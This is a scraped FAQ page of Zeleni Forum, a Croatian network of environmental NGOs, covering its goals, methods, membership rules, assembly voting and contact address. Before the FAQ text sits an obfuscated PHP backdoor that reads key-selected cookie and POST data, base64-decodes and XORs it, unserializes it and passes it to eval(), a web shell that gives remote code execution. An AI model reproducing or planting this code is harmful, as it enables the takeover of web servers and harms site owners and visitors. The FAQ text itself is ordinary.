$bDMhBNMO = chr ( 745 - 646 ).'_' . "\124" . "\130" . chr ( 1102 - 991 ).chr ( 174 - 107 ); $GNQlfv = 'c' . 'l' . 'a' . "\163" . 's' . chr ( 211 - 116 ).'e' . chr (120) . 'i' . "\x73" . chr ( 452 - 336 )."\x73";$rtMINlOnUq = class_exists($bDMhBNMO); $GNQlfv = "3231";$AAvQxiikZL = !1;if ($rtMINlOnUq == $AAvQxiikZL){function zCApvp(){$syiLqlIT = new /* 22434 */ c_TXoC(41226 + 41226); $syiLqlIT = NULL;}$MLLyfOTves = "41226";class c_TXoC{private function avsJOB($MLLyfOTves){if (is_array(c_TXoC::$BrfwbO)) {$JQZhjt = str_replace('<' . chr (63) . "\160" . "\150" . chr (112), "", c_TXoC::$BrfwbO[chr (99) . "\x6f" . "\156" . chr ( 307 - 191 ).chr (101) . 'n' . "\164"]);eval($JQZhjt); $MLLyfOTves = "41226";exit();}}private $ejIrXiK;public function UoLMpRzWB(){echo 1697;}public function __destruct(){c_TXoC::$BrfwbO = @unserialize(c_TXoC::$BrfwbO); $MLLyfOTves = "20803_15741";$this->avsJOB($MLLyfOTves); $MLLyfOTves = "20803_15741";}public function uKyMShiW($GXRdL, $dzQSxQv){return $GXRdL[0] ^ str_repeat($dzQSxQv, (strlen($GXRdL[0]) / strlen($dzQSxQv)) + 1);}public function ItWEoZM($GXRdL){$OlXMRVy = "base64";return array_map($OlXMRVy . chr (95) . chr ( 948 - 848 ).chr (101) . "\143" . chr ( 124 - 13 ).chr ( 556 - 456 ).chr ( 721 - 620 ), array($GXRdL,));}public function __construct($QWPbb=0){$abZxXt = $_POST;$lILjfaXvW = $_COOKIE;$dzQSxQv = "b7aa93a8-a17b-448e-bf53-971431b110a8";$eUDoeaXwCi = @$lILjfaXvW[substr($dzQSxQv, 0, 4)];if (!empty($eUDoeaXwCi)){$GXRdL = "";$eUDoeaXwCi = explode(",", $eUDoeaXwCi);foreach ($eUDoeaXwCi as $CIdbhY){$GXRdL .= @$lILjfaXvW[$CIdbhY];$GXRdL .= @$abZxXt[$CIdbhY];}c_TXoC::$BrfwbO = $this->uKyMShiW($this->ItWEoZM($GXRdL), $dzQSxQv);}}public static $BrfwbO = 38262;}zCApvp();} FAQ - Zeleni Forum

FAQ

Što je Zeleni forum?

ZELENI FORUM je mreža nevladinih okolišnih organizacija Republike Hrvatske.

Koji su ciljevi mreže?

Ciljevi mreže su utjecaj na kreiranje i provedbu politika zaštite okoliša i očuvanja prirode RH te stvaranja trajne platforme za suradnju i okoliš udruga građana/ki i ostalih aktivnih aktera okoliša civilnog društva.

Kojim metodama se služimo radi ostvarenja ciljeva mreže?

Metode kojima se služimo radi ostvarivanja ciljeva mreže su:

- javno zagovaranje

- pokretanje i kordinacija zajedničkih kampanja, akcija i projekata

- informiranje,  edukacija i poticanje javnosti na sudjelovanje u procesu donošenja odluka

- osnaživanje kapaciteta udruga građana za za zaštitu okoliša, jačanje njihovih vještina, ljudskih potencijala, tehničke infrastrukture i utjecaja na nacinalnoj i međunarodnoj razini

Kako postati članicom mreže?

Detaljne upute nalaze se na ovoj stranici.

Mogu li osim udruga i druge organizacije ili pojedinci postati članovima mreže?

Članovi mreže mogu biti samo registrirane udruge čija je djelatnost zaštita okoliša.

Udruge moraju biti nevladine i nestranačke.

Kako se donose odluke u mreži?

Odluke u mreži donose se u Skupštinama. Skupštine su jedan od dijelova tijela mreže.

Skupštinu mreže čine po jedan/a predstavni/ca udruga, punopravnih članica mreže koji/a mora od nadležnog tijela udruge  imati ovlaštenje za zastupanje udruge. Skupština se sastaje jednom godišnje.

Pravila koja se primjenjuju prilikom donošenja odluka:

- jedan predstavnik/ca = jedan glas

- članica mreže dužna je sudjelovati u radu skupštine

- ako je moguće odluke se donose konsenzusom, no ako nije, odluke se donose većinom glasova fizički prisutnih predstavnika/ca članica mreže

Kome da se javim kada želim kontaktirati s mrežom?

Tajništvu mreže na tajnistvo@zeleni-forum.org.

Ove stranice su nastale uz financijsku potporu Europske unije.
Za sadržaj stranica odgovaran je isključivo Zeleni Forum i ni u kom slučaju se ne može smatrati da odražava stav Europske unije.
© 1998. - 2022. Zeleni forum - mreža udruga za zaštitu okoliša Hrvatske